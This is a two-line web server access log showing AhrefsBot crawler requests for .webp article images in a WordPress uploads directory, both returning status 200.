198.244.242.221 - - [04/Jun/2026:23:46:46 +0800] "GET /wp-content/uploads/2026/06/1780363375-3Article_images_W900px.webp HTTP/1.1" 200 59640 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
51.195.244.255 - - [04/Jun/2026:23:46:48 +0800] "GET /wp-content/uploads/2026/06/1780363378-1Article_images_W900px.webp HTTP/1.1" 200 62100 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"